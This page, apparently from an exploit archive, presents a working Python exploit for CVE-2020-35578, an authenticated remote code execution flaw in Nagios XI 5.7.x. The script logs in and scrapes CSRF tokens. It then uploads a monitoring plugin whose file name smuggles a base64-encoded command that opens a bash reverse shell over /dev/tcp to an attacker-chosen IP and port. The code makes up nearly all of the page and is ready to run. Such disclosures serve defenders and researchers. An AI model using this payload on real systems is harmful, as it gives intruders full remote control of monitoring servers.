Nagios XI 5.7.x Remote Code Execution

2021.01.15
Credit: Haboob Team
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated) # Date: 19/12/2020 # Exploit Author: Haboob Team (https://haboob.sa) # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Version: Nagios XI 5.7.x # Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM # CVE: CVE-2020-35578 #!/usr/bin/python3 # pip3 install bs4 lxml import requests import sys import warnings from bs4 import BeautifulSoup import base64 import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port") print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() def login(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[0].get('value') print("[+] Extract login nsp token : %s" % nsp_str) # Login login_info = { "nsp": nsp_str, "pageopt": "login", "username": username, "password": password } login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False) login_text = login_request.text # Check Login Status if "Core Config Manager" in login_text: return True else: print("[-] Login ... Failed!") return False def execute_payload(): # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks) print("[+] Request upload form ...") nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False) content = nsp_str_req.text soup = BeautifulSoup(content, "lxml") nsp_str = soup.find_all('input')[1].get('value') print("[+] Extract upload nsp token : %s" % nsp_str) # Payload Base64 Encoding payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port) payload_bytes = payload_decoded.encode('ascii') base64_bytes = base64.b64encode(payload_bytes) payload_encoded = base64_bytes.decode('ascii') payload = ";echo " + payload_encoded + " | base64 -d | bash;#" print("[+] Base64 encoded payload : %s" % payload) # Payload Execution multipart_form_data = { 'upload': (None, '', None), 'nsp': (None, nsp_str, None), 'uploadedfile': (payload, 'whatever', 'text/plain'), 'convert_to_unix': (None, '1', None), } print("[+] Sending payload ...") print("[+] Check your nc ...") rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False) if login(): print("[+] Login ... Success!") execute_payload()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top